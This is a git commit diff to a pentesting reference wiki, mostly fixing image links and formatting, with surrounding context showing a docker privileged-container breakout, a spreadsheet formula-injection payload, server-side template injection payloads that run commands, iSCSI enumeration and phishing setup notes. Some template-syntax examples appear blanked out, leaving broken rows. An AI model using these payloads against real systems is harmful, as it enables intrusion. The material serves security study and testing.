GitBook: [master] 11 pages and 18 assets modified

1911-pentesting-fox.md

@@ -10,7 +10,7 @@ dht udp "DHT Nodes"
 
 ![](.gitbook/assets/image%20%28182%29.png)
 
-![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
+![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
 
 InfluxDB
 

forensics/basic-forensics-esp/linux-forensics.md

@@ -395,7 +395,7 @@ Partition Record Format:
 
 In order to mount a MBR in Linux you first need to get the start offset \(you can use `fdisk` and the the `p` command\)
 
-![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%283%29%20%283%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%283%29%20%283%29%20%282%29%20%281%29.png)
 
 An then use the following code
 

linux-unix/privilege-escalation/docker-breakout.md

@@ -50,16 +50,14 @@ Well configured docker containers won't allow command like **fdisk -l**. However
 
 So to take over the host machine, it is trivial:
 
-```sh
+```bash
 mkdir -p /mnt/hola
 mount /dev/sda1 /mnt/hola
 ```
 
 And voilà ! You can now acces the filesystem of the host because it is mounted in the /mnt/hole folder.
 
-
 {% code title="Initial PoC" %}
-
 ```bash
 # spawn a new container to exploit via:
 # docker run --rm -it --privileged ubuntu bash
@@ -75,9 +73,7 @@ sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
 ```
 {% endcode %}
 
-
 {% code title="Second PoC" %}
-
 ```bash
 # On the host
 docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md

@@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
 
 ![](../../../.gitbook/assets/image%20%28211%29.png)
 
-![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
 
 Because you will be able to call them
 

mobile-apps-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md

@@ -4,7 +4,6 @@
 
 [![objection](https://github.com/sensepost/objection/raw/master/images/objection.png)](https://github.com/sensepost/objection)
 
-
 **objection - Runtime Mobile Exploration**
 
 `objection` is a runtime mobile exploration toolkit, powered by [Frida](https://www.frida.re/). It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.

pentesting-web/formula-injection.md

@@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
 
 It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
 
-![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
+![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
 

pentesting-web/ssti-server-side-template-injection.md

@@ -70,8 +70,6 @@ Otherwise, you'll need to manually **test different language-specific payloads**
 
 ![](../.gitbook/assets/image%20%289%29.png)
 
-
-
 ### Exploit
 
 #### Read
@@ -187,9 +185,9 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 
 ### Handlebars \(NodeJS\)
 
-* {{7\*7}} = Error
+*  = Error
 * ${7\*7} = ${7\*7}
-* {{foobar}} Nothing
+*  Nothing
 
 ```text
 wrtz{{#with "s" as |string|}}
@@ -224,12 +222,12 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%
 
 | **Template** | **Description** |
 | :--- | :--- |
-| {{: …}} | Evaluate and render output |
-| {{> …}} | Evaluate and render HTML encoded output |
-| {{!– … –}} | Comment |
-| {{\* …}} and {{\*: …}} | Allow code \(disabled by default\) |
+|  | Evaluate and render output |
+|  | Evaluate and render HTML encoded output |
+|  | Comment |
+|  and  | Allow code \(disabled by default\) |
 
-* {{:7\*7}} = 49
+*  = 49
 
 #### Client Side
 
@@ -358,5 +356,3 @@ If you think it could be useful, read:
 * [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
 * [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
 
-
-

pentesting/3260-pentesting-iscsi.md

@@ -15,7 +15,7 @@ PORT     STATE SERVICE VERSION
 
 ## Enumeration
 
-```
+```text
 nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx
 ```
 
@@ -27,16 +27,17 @@ This script will indicate if authentication is required.
 
 **Note:** You may find that when your targets are discovered, they are listed under a different IP address. This tends to happen if the iSCSI service is exposed via NAT or a virtual IP. In cases like these, `iscsiadmin` will fail to connect. This requires two tweaks: one to the directory name of the node automatically created by your discovery activities, and one to the `default` file contained within this directory.
 
-For example, you are trying to connect to an iSCSI target on 123.123.123.123 at port 3260. The server exposing the iSCSI target is actually at 192.168.1.2 but exposed via NAT. isciadm will register the *internal* address rather than the *public* address:
+For example, you are trying to connect to an iSCSI target on 123.123.123.123 at port 3260. The server exposing the iSCSI target is actually at 192.168.1.2 but exposed via NAT. isciadm will register the _internal_ address rather than the _public_ address:
 
-```
+```text
 iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
 192.168.1.2:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
 [...]
 ```
 
 This command will create a directory in your filesystem like this:
-```
+
+```text
 /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/
 ```
 
@@ -57,7 +58,7 @@ sudo apt-get install open-iscsi
 
 First of all you need to **discover the targets** name behind the IP:
 
-```
+```text
 iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
 123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
 [2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382
@@ -168,7 +169,5 @@ node.conn[0].iscsi.OFMarker = No
 
 ## **References**
 
-{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
-
-
+{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" caption="" %}
 

phishing-methodology/README.md

@@ -320,7 +320,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
 * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
 * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
 
-![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29%20%281%29.png)
+![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29%20%281%29%20%281%29.png)
 
 {% hint style="info" %}
 It's recommended to use the "**Send Test Email**" functionality to test that everything is working.  

physical-attacks/physical-attacks.md

@@ -132,7 +132,3 @@ To check the valid recovery keys you can execute:
 manage-bde -protectors -get c:
 ```
 
-
-
-
-

windows/ntlm/README.md

@@ -30,6 +30,17 @@ This will set the level 5:
 reg add HKLM\SYSTEM\CurrentControlSet\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
 ```
 
+Possible values:
+
+```text
+0 - Send LM & NTLM responses
+1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
+2 - Send NTLM response only
+3 - Send NTLMv2 response only
+4 - Send NTLMv2 response only, refuse LM
+5 - Send NTLMv2 response only, refuse LM & NTLM
+```
+
 ## Basic NTLM Domain authentication Scheme
 
 1. The **user** introduces his **credentials**